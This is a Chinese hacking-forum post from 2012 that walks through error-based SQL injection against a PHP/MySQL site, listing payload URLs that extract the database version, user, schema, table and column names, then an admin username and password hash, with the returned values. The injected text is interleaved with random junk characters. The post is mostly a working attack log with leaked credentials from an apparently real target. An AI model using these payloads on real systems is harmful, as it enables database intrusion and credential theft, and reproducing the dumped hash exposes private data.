找回密码
 立即注册
查看: 2413|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666' N5 d; e0 K" _) U2 z

* D- V6 g6 R7 H0 ^& h3 M之前想找个测试 没想到这有 可以测试下做个记录而已
- _: _9 ?& J$ s' t* l/ s" D8 q. L4 x7 o! m
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
0 z4 W* S/ f+ D6 S5 k
7 d& n$ k9 A, x( c7 I/data0/htdocs/leqi_new/app/myapp.php
% b! g9 a) C& a6 |
5 c% ?3 r$ d2 q4 u 或者9 P5 i  z, k- L8 {! G8 Z
; z& x' f7 k# t3 A2 n4 o
/**********version()**********/ 5.1.49-log& ^0 _9 s; r: [- x( W
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003- K5 \0 H& R# W8 e$ Q. J& j. K# F
1 @/ e+ O! g4 |+ K. v- G+ D: [
/**********user()**********/  7 ]& [0 i. [9 Y; U; x9 t2 S- O  ^
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003+ N4 E- ^# h5 x3 l" A' W
! M+ r8 p7 a) L4 X' N
/**********database()**********/  leqi" r* d% o( i  L/ l7 h
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003) M( L4 h, S+ ]: d: s& {
% ]) D: D6 d# M% r$ z
/**********limit依次递归爆库**********/( _# v# c. s0 j. _1 e3 N
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
$ d& K3 s- z/ l  Xinformation_schema! d) P$ f! T$ t3 I, Y
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
7 u% \/ L# z/ d: a/ p) Eleqi3 L! O% N5 m# |/ N4 W: V1 Z
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0030 O( T1 j- [5 ]
test( O2 Y' a% z% ?4 M# Y
$ m& ]$ q& @/ R1 c8 S- @1 t* ?
/**********limit依次递归爆表名**********/
8 g! @: a6 q2 @- q7 ]1 t' P5 yhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0032 U. V, h1 [$ n! J! v- ~* k7 _
users7 m. z; b4 ]( K6 K& N

$ U  O( F6 U9 M/**********limit依次递归爆字段名**********/
; b( P5 i! h* p( `( ehttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
" D# c; D- _/ n$ |4 R) U' J: Zuser_id,username,nickname,passwd,group_id8 V8 P$ s1 b' A; a" n
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
* }+ a1 p3 ^+ y, `7 u/wapc/5000_0005_003  Z  h( u( v  O2 s8 U9 C* @2 r2 F
11 21
/ k! w( {0 a& A) h9 \http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23" A$ Z( i, ~+ P; _6 H" G
/wapc/5000_0005_003
% A3 e1 {, H/ I5 v- W) V4 e11 341 351 361
- s# ]' N) h9 y% F; X/**********爆数据**********/
9 s$ \; F; n8 t- h$ Hhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
9 c; c' D( W0 T: h% w4 g7 X$ \admin7 X& I# @9 b$ |$ y+ ]: t( d
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23. s+ z! v( \7 B5 ~; U
6a8b4574ca231eb8bd52764d4978ffcd
' s+ o9 h! B- D) ~: r& {" [% y. M( c3 E$ J( J

& E6 `& \0 p  y5 s. S
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表